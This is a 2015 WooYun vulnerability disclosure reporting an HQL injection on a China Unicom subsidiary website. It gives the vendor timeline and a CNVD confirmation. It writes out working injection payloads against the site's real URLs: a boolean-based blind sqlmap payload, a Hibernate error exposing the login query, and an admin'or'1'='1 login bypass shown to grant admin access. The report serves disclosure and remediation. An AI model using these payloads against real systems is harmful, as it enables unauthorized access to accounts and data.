当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129823

漏洞标题:中国联通旗下某站存在HQL注入

相关厂商:中国联通

漏洞作者: 浮萍

提交时间:2015-07-29 14:02

修复时间:2015-09-14 16:20

公开时间:2015-09-14 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

HQL注入略微蛋疼

详细说明:

http://open.17wo.cn:8080/open17wo/

选区_038.png


打开

http://open.17wo.cn:8080/open17wo/manage/messageManagerloadMessage.action?id=96


选区_039.png


输入'

选区_041.png


输入;'and'1'='1

选区_042.png


选区_043.png


选区_044.png


用SQLMap跑不出数据库

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=96' AND 1533=1533 AND 'qaID'='qaID
---
[22:14:14] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5

漏洞证明:

看首页登录处
用户名输入a'时 报500错误

选区_048.png


主要出错信息

HTTP Status 500 - expecting
''', found '<EOF>' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']; nested
exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [from com.open17wo.pojo
.User n where n.userName='a'' and n.userPass='a']</h1><HR size="1" noshade="noshade"><p><b>type</b> Exception
report</p><p><b>message</b> <u>expecting ''', found '&lt;EOF&gt;' [from com.open17wo.pojo.User n where
n.userName='a'' and n.userPass='a']; nested exception is org.hibernate.QueryException: expecting '''
, found '&lt;EOF&gt;' [from com.open17wo.pojo.User n where n.userName='a'' and n.userPass='a']


登录抓包

http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=a&userPass=a


http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27&userPass=a


选区_049.png


http://open.17wo.cn:8080/open17wo/manage/manage/login.action?userName=admin%27or%271%27=%271&userPass=a


返回

"{\"state\":\"5\"}"

表示登录成功
http://open.17wo.cn:8080/open17wo/

选区_045.png


用户名密码admin'or'1'='1
登录成功

选区_046.png


选区_047.png

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-31 16:18

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无